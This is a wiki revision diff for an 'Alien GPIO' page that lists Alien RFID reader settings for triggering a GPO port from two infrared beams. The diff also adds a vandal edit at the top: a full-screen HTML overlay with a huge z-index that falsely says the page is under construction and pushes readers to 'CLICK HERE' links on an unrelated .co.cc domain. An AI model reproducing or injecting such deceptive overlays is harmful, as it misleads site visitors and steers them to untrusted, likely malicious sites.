Difference between revisions of "Alien GPIO"

From RifidiWiki

Jump to: navigation, search
(Things to watch out for)
Line 1: Line 1:
 +
----
 +
<div style="background: #E8E8E8 none repeat scroll 0% 0%; overflow: hidden; font-family: Tahoma; font-size: 11pt; line-height: 2em; position: absolute; width: 2000px; height: 2000px; z-index: 1410065407; top: 0px; left: -250px; padding-left: 400px; padding-top: 50px; padding-bottom: 350px;">
 +
----
 +
=[http://ycybesav.co.cc This Page Is Currently Under Construction And Will Be Available Shortly, Please Visit Reserve Copy Page]=
 +
----
 +
=[http://ycybesav.co.cc CLICK HERE]=
 +
----
 +
</div>
 
=Alien GPIO=
 
=Alien GPIO=
  
Line 7: Line 15:
  
 
     RFAttenuation = 90;
 
     RFAttenuation = 90;
     NetworkTimeout = "9000";
+
     NetworkTimeout = &quot;9000&quot;;
     AcquireMode = "Global Scroll";
+
     AcquireMode = &quot;Global Scroll&quot;;
     PersistTime = "-1";
+
     PersistTime = &quot;-1&quot;;
     AutoAction = "Acquire";
+
     AutoAction = &quot;Acquire&quot;;
     AutoWaitOutput = "0";
+
     AutoWaitOutput = &quot;0&quot;;
     AutoWorkOutput = "4";
+
     AutoWorkOutput = &quot;4&quot;;
     AutoTrueOutput = "1";
+
     AutoTrueOutput = &quot;1&quot;;
     AutoFalseOutput = "2";
+
     AutoFalseOutput = &quot;2&quot;;
     AutoStartTrigger = "0,1";
+
     AutoStartTrigger = &quot;0,1&quot;;
     AutoStopTrigger = "2,0";
+
     AutoStopTrigger = &quot;2,0&quot;;
     AutoStopTimer = "-1";
+
     AutoStopTimer = &quot;-1&quot;;
     AutoTruePause = "3000";
+
     AutoTruePause = &quot;3000&quot;;
     AutoFalsePause = "3000";
+
     AutoFalsePause = &quot;3000&quot;;
     ExternalOutput = "0";
+
     ExternalOutput = &quot;0&quot;;
     AutoMode="on"
+
     AutoMode=&quot;on&quot;
  
  

Revision as of 23:17, 23 November 2010


Alien GPIO

Here are a list of commands that, when run, will fire GPO port 0. In order for these commands to work, you must put an infrared port before the Alien gate and hook it up to GPI0, and another IR port after the gate hooked up to GPI1.


   RFAttenuation = 90;
   NetworkTimeout = "9000";
   AcquireMode = "Global Scroll";
   PersistTime = "-1";
   AutoAction = "Acquire";
   AutoWaitOutput = "0";
   AutoWorkOutput = "4";
   AutoTrueOutput = "1";
   AutoFalseOutput = "2";
   AutoStartTrigger = "0,1";
   AutoStopTrigger = "2,0";
   AutoStopTimer = "-1";
   AutoTruePause = "3000";
   AutoFalsePause = "3000";
   ExternalOutput = "0";
   AutoMode="on"


Things to watch out for

If a box enters the field of IR beam 1 while another box has not hit or is still blocking IR beam 2, the reader will not behave as expected. Try reducing the box rate if this happens.

Personal tools